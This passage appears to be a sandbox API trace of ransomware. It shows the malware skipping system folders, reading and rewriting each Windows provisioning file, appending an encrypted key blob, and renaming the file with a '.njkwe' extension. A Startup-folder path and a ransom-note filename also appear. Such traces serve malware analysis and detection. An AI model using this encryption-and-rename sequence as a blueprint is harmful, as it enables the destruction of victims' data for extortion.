returned 192 [0077.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\220__connections_cellular_cable and wireless (jamaica)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\220__Connections_Cellular_Cable and Wireless (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\220__connections_cellular_cable and wireless (jamaica)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.408] GetProcessHeap () returned 0xbe0000 [0077.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.408] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90817d73, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90817d73, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90817d73, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x312, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", cAlternateFileName="221__C~1.PRO")) returned 1 [0077.408] lstrcmpiW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.408] lstrcmpiW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.408] lstrcmpiW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.408] lstrcmpiW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.408] lstrcmpiW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.408] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml") returned 161 [0077.408] StrStrIW (lpFirst="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.408] lstrcmpW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.408] lstrcmpW (lpString1="221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.408] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\221__connections_cellular_digicel (jamaica)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.409] GetTickCount () returned 0x1153b02 [0077.409] GetTickCount () returned 0x1153b02 [0077.409] GetTickCount () returned 0x1153b02 [0077.409] GetTickCount () returned 0x1153b02 [0077.409] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.409] GetProcessHeap () returned 0xbe0000 [0077.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.409] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x312, lpOverlapped=0x0) returned 1 [0077.410] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.410] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x312, lpOverlapped=0x0) returned 1 [0077.411] GetProcessHeap () returned 0xbe0000 [0077.411] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.411] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.411] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.411] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.411] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.411] CloseHandle (hObject=0x43c) returned 1 [0077.411] GetProcessHeap () returned 0xbe0000 [0077.411] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.411] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\221__connections_cellular_digicel (jamaica)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\221__Connections_Cellular_DigiCel (Jamaica)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\221__connections_cellular_digicel (jamaica)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.412] GetProcessHeap () returned 0xbe0000 [0077.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.412] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9083dfdf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9083dfdf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9083dfdf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="222__C~1.PRO")) returned 1 [0077.412] lstrcmpiW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.412] lstrcmpiW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.412] lstrcmpiW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.412] lstrcmpiW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.412] lstrcmpiW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.412] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml") returned 158 [0077.412] StrStrIW (lpFirst="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.412] lstrcmpW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.412] lstrcmpW (lpString1="222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.412] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.412] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\222__connections_cellular_docomo (japan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.413] GetTickCount () returned 0x1153b02 [0077.413] GetTickCount () returned 0x1153b02 [0077.413] GetTickCount () returned 0x1153b02 [0077.413] GetTickCount () returned 0x1153b02 [0077.413] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.413] GetProcessHeap () returned 0xbe0000 [0077.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.413] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.414] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.414] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0077.415] GetProcessHeap () returned 0xbe0000 [0077.415] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.415] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.415] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.415] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.415] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.415] CloseHandle (hObject=0x43c) returned 1 [0077.415] GetProcessHeap () returned 0xbe0000 [0077.415] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.415] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\222__connections_cellular_docomo (japan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\222__Connections_Cellular_DoCoMo (Japan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\222__connections_cellular_docomo (japan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.416] GetProcessHeap () returned 0xbe0000 [0077.416] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.416] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9083dfdf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9083dfdf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9083dfdf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", cAlternateFileName="223__C~1.PRO")) returned 1 [0077.416] lstrcmpiW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.416] lstrcmpiW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.416] lstrcmpiW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.416] lstrcmpiW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.416] lstrcmpiW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.416] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml") returned 158 [0077.416] StrStrIW (lpFirst="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.416] lstrcmpW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.416] lstrcmpW (lpString1="223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.416] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\223__connections_cellular_docomo (japan)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.417] GetTickCount () returned 0x1153b02 [0077.417] GetTickCount () returned 0x1153b02 [0077.417] GetTickCount () returned 0x1153b02 [0077.417] GetTickCount () returned 0x1153b02 [0077.417] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.417] GetProcessHeap () returned 0xbe0000 [0077.417] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.417] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0077.418] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.418] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2de, lpOverlapped=0x0) returned 1 [0077.418] GetProcessHeap () returned 0xbe0000 [0077.418] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.418] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.419] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.419] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.419] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.419] CloseHandle (hObject=0x43c) returned 1 [0077.419] GetProcessHeap () returned 0xbe0000 [0077.419] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.419] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\223__connections_cellular_docomo (japan)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\223__Connections_Cellular_DoCoMo (Japan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\223__connections_cellular_docomo (japan)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.419] GetProcessHeap () returned 0xbe0000 [0077.419] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.420] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9083dfdf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9083dfdf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9083dfdf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", cAlternateFileName="224__C~1.PRO")) returned 1 [0077.426] lstrcmpiW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.426] lstrcmpiW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.426] lstrcmpiW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.426] lstrcmpiW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.426] lstrcmpiW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.426] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml") returned 158 [0077.426] StrStrIW (lpFirst="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.426] lstrcmpW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.426] lstrcmpW (lpString1="224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.426] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\224__connections_cellular_docomo (japan)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.426] GetTickCount () returned 0x1153b11 [0077.426] GetTickCount () returned 0x1153b11 [0077.426] GetTickCount () returned 0x1153b11 [0077.426] GetTickCount () returned 0x1153b11 [0077.426] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.427] GetProcessHeap () returned 0xbe0000 [0077.427] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.427] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0077.428] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.428] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0077.428] GetProcessHeap () returned 0xbe0000 [0077.428] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.428] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 